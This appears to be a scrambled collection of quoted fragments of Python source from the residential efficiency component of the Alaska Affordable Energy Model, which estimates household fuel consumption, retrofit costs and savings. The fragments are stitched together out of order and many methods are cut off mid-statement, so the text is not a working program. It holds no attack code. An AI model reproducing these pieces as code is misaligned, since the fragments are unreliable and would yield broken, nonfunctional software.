consumption Attributes: baseline_fuel_Hoil_consumption :", "float the total fuel saved in gallons \"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat", "self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption", "Oil (gallons/year) Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential:", "rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns -------", "price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price = self.cd['natural", "return # needed for electric or HF component and has a default value", "\"\"\" def __init__ (self, community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class", "Propane (gallons/year) Cost Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG,", "= np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar,", "self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction multiplier'", "self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price", "* (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community", "\\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total", "import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from", "cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel", "community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate", "\\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes", "= self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\", "gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price + \\", "(gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential:", "Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric", "Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\": r_bio_cost, \"Residential: Heating", "to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was", "/ 100.0 self.savings_kWh = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_kWh)", "self.component_name = COMPONENT_NAME self.forecast = forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] *", "electric consumption per household (kWh/year). >= 6000 \"\"\" # 500 average energy use,", "self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\", "All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Post Retrofit\":", "\"\"\"Get the average monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH", "if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if", "in propane consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total", "/ \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns = [\"HH\"] self.households", "amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\", "int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house))", "LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price # coal,solar, other def calc_baseline_kWh_cost (self): \"\"\"calculate", "- self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption - self.savings_kWh self.proposed_HF_consumption = \\ self.baseline_HF_consumption -", "proposed_kWh_consumption : np.array set to baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost", "self.cd['propane price'] gas_price = self.cd['natural gas price'] else: HF_price = np.nan wood_price =", "self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the average monthly consumption of electricity for a", "Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\", \"Residential: Electric Heat (kWh/year)", "s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP =", "def calc_savings_opportunities (self): \"\"\"Calculate savings opportunities Attributes ---------- opportunity_HH : int Houses that", "= self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 percent_accounted +=", "energy produced. Returns ------- float the total energy produced \"\"\" # no electric", "float initial heating cordwood consumption init_gas : float initial natural gas fuel consumption", "Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\", \"Residential: Heating Fuel All (MMBtu/year)", "self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH = 0 self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit", "values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost Attributes", "each of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) /", "($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric", "---------- diagnostics : diagnostics for tracking error/warning messages initial value: diag or new", "def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array baseline", "self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost()", "\"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data =", "a percentage of the pre-retrofit consumption, and the forecasted price of offset heating", "* constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) * \\ scaler *", "Attributes ---------- baseline_HF_cost : np.array baseline cost of heating fuels per year \"\"\"", "(gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential:", "Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost", "amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH,", "\"Not a residential project.\" return # needed for electric or HF component and", "self.set_forecast_columns() if self.cd[\"model financial\"]: self.calc_capital_costs() self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings()", "of houses cf: float conversion factor Returns ------- float: fuel consumed for a", "All (MMBtu/year) Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\":", "np.float64(rd[\"Fuel Oil\"]) / 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF)", "Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices", "- r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost", "b_oil_cost - r_oil_cost b_bio = self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords r_bio = self.proposed_fuel_wood_consumption/constants.mmbtu_to_cords s_bio = b_bio -", "for the first year of the project Attributes ---------- init_HH : int estimated", "np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\":", "Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year)", "fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt *", "price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price +", "+ str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households for the first", "* cf) def calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array", "elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil = self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF r_oil", "Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\",", "total, HH, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh =", ": np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption", "/ 100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area", "peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households = np.round(self.forecast.population / np.float64(peps_per_house)) households.columns", "LP_price + \\ self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity", "costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV", "\"heating_fuel_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [cords/year]\", years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years,", "fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings (self): \"\"\"calculate annual heating savings", "Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\":", "s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption", "fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array", "module, see information on Forecast Object aaem.diagnostics : diagnostics module, see information on", "\\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0) *", "amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt,", "def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes ----------", ": dictionary of components, optional prerequisite component data \"\"\" self.diagnostics = diag if", "forecast community forecast for estimating future values initial value: forecast cd : dictionary", "int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households =", "from pandas import DataFrame import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import", "run (self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual", "initialiser Parameters ---------- community_data : CommunityData CommunityData Object for a community forecast :", "self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption", "of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate", "data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data", "year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total fuel saved. Returns ------- float the", "if not self.was_run: return if self.cd[\"model financial\"]: HF_price = (self.diesel_prices + self.cd['heating fuel", "Attributes ---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost -", "elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP = self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP", "print len(kWh_cost) self.baseline_kWh_cost = self.baseline_kWh_consumption * kWh_cost def calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed", "\" corrected to \"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average", "id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run = False self.reason", "consumption savings_mmbtu: float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH", "created by the project Attributes ---------- annual_electric_savings : np.array electric savings ($/year) are", "Retrofit\", \"Residential: Electric Heat (kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\",", "pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the", "Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane", "r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP", "constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total,", "to retrofit was negative, setting to 0\" ) ## % as decimal #~", "Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\", \"Residential: Total Cost Savings", "Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year)", "proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption =", "r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf", "\"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year)", "avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >= 6000 \"\"\" #", "(MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH percent_accounted = 0", "prerequisite component data \"\"\" self.diagnostics = diag if self.diagnostics == None: self.diagnostics =", "Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\",", "Consumption Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential:", "self.cd['heating fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price =", "calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings", "\"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost", "self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost = \\ self.baseline_fuel_Hoil_consumption * HF_price", "percent_accounted += amnt self.init_gas = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) /", "\"\"\"Get total energy produced. Returns ------- float the total energy produced \"\"\" #", "(kWh/year) Cost Savings\", \"Residential: Heating Propane (gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year)", "\"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year)", "Savings\": s_LP_cost, \"Residential: Heating Natural Gas (Mcf/year) Consumption Baseline\": b_NG, \"Residential: Heating Natural", "Return will all be calculated. There must be a known Heat Recovery project", "np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0]", ": path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price", "- r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost", "NPV Costs, NPV Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal", "for residential buildings HH : float a # of houses cf: float conversion", "# no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def calc_avg_consumption (self): \"\"\"Get the", "each fuel type. Attributes ---------- init_HF : float initial heating oil consumption init_wood", "future values initial value: forecast cd : dictionary general data for a community.", "heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array proposed", "from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import Forecast from", "Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Propane (gallons/year) Consumption", "self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption if self.cd['natural", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year) Cost Baseline\",", "is also calculated. Parameters ---------- community_data : CommunityData CommunityData Object for a community", "Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat (kWh/year) Consumption", "(self): \"\"\"Get total energy produced. Returns ------- float the total energy produced \"\"\"", "Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating", "baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption", "(kWh/year) Cost Post Retrofit\": r_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential:", "the pre-retrofit consumption, and the forecasted price of offset heating fuels. The cost", "Buildings' section of community_data See also -------- aaem.community_data : community data module, see", ": string lists reason for failure if run == False Notes ----- Accepted", "for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household", "cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline", "#~ ix[\"yearly electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs", "optional diagnostics for tracking error/warning messages prerequisites : dictionary of components, optional prerequisite", "= self.baseline_HF_cost - \\ self.proposed_HF_cost def set_forecast_columns (self): \"\"\"Set columns in the the", "of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption", "other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed kWh consumption for a community Attributes", "post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self):", "np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total,", "* gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ---------- proposed_kWh_cost:", "Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost Post Retrofit\": r_elec_cost,", "(cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year) Consumption Savings\", \"Residential: Electric Heat", "self.proposed_fuel_Hoil_consumption = \\ self.baseline_fuel_Hoil_consumption - self.savings_HF self.proposed_fuel_wood_consumption = \\ self.baseline_fuel_wood_consumption - self.savings_wood self.proposed_fuel_LP_consumption", "Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat (kWh/year) Cost", "---------- run : bool True in the component runs to completion, False otherwise", "msg = str(round(percent_accounted)) + \\ \" of residential fuel sources accounted for\" self.diagnostics.add_note(self.component_name,", "% of fuel used total_consumption : float total consumption for residential buildings HH", "Post Retrofit\": r_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating", "consumption savings_kWh : float savings in electric consumption savings_mmbtu: float total savings in", "consumed for a type of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH *", "Heating Biomass (cords/year) Cost Baseline\", \"Residential: Heating Biomass (cords/year) Cost Post Retrofit\", \"Residential:", "(gallons/year) Cost Baseline\", \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane", "Net Benefits, Benefit-Cost Ratio, Levelized Cost of Energy, and Internal Rate of Return", "section of community_data comp_specs : dictionary component specific data for a community. Initial", "of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0", "rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] * self.opportunity_HH #~ self.baseline_total_energy_consumption = total HH = self.init_HH", "natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array proposed", "house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold) or np.isnan(avg_con): avg_con =", "- self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler *", "total, 1, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction *", "Biomass (cords/year) Cost Post Retrofit\", \"Residential: Heating Biomass (cords/year) Cost Savings\", \"Residential: Electric", "= {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs, Annual Net", "= households.ix[self.start_year:self.end_year].T.values[0] val = self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop)))", "wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price']", "\"Residential: Electric Heat (kWh/year) Consumption Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post", "percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) /", "Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption", "## total consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption", "consumption init_wood : float initial heating cordwood consumption init_gas : float initial natural", "Attributes ---------- avg_kWh_consumption_per_HH : float average electric consumption per household (kWh/year). >= 6000", "Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential:", "Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass", "baseline values \"\"\" self.proposed_kWh_consumption = self.baseline_kWh_consumption def calc_proposed_fuel_cost (self): \"\"\"Calculate proposed heating cost", "---------- community_data : CommunityData CommunityData Object for a community forecast : Forecast forecast", "set_forecast_columns (self): \"\"\"Set columns in the the forecast to values calculated in this", "on the number of units that have not been retrofit as of 2010,", "energy efficiency component of the Alaska Affordable Energy Model: This module estimates the", "= np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit Avg", "kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array electric consumption per", "(gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass", "\"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year)", "the component. The Annual Total Savings,Annual Costs, Annual Net Benefit, NPV Benefits, NPV", "\"+ str(con_threshold)+\" kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \"", "heating fuels. The cost to retrofit each home is also calculated. Parameters ----------", "amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0", "function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"]) / 100.0 self.savings_HF =", "#~ self.baseline_fuel_other_consumption if self.cd['natural gas price'] == 0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption =", "electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption = \\", "s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric Heat (kWh/year) Cost", "con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \" corrected to \"+ str(con_threshold)+\" kWh per", "np.nan wood_price = np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan", "fuels per year \"\"\" HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price =", "diagnostics : diagnostics for tracking error/warning messages initial value: diag or new diagnostics", "kWh per year\")) self.avg_kWh_consumption_per_HH = avg_con self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH)", "self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural", "Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil", "Benefit ($/year)\": self.get_net_benefit(), }, years) try: df = df.round().astype(int) except ValueError: pass df", "/ 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt =", "otherwise reason : string lists reason for failure if run == False Notes", "import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as constants from config import", "HF component and has a default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption()", "forecast : Forecast forecast for a community diagnostics : diagnostics, optional diagnostics for", "for estimating future values initial value: forecast cd : dictionary general data for", ": np.array baseline total heating fuel consumption \"\"\" rd = self.comp_specs['data'] self.fuel_oil_percent =", "gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption * HF_price + \\", "Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential:", "con_threshold = self.comp_specs['min kWh per household'] yr = int(self.comp_specs['data']['Year']) #~ houses = int(self.comp_specs['data']['Total", "Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\", \"Residential:", "float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential", "(1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption *", "baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array baseline natural gas consumption", "directory): \"\"\"Save the component output csv in directory Parameters ---------- directory : path", "self.diagnostics = diag if self.diagnostics == None: self.diagnostics = diagnostics() self.intertie_data = community_data.intertie_data", "def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. Attributes ----------", "proposed heating oil consumption proposed_fuel_wood_consumption : np.array proposed cordwood consumption proposed_fuel_LP_consumption : np.array", "= np.nan elec_price = np.nan LP_price = np.nan gas_price = np.nan b_oil =", "+ self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood price'] elec_price =", "the base and proposed fuel costs 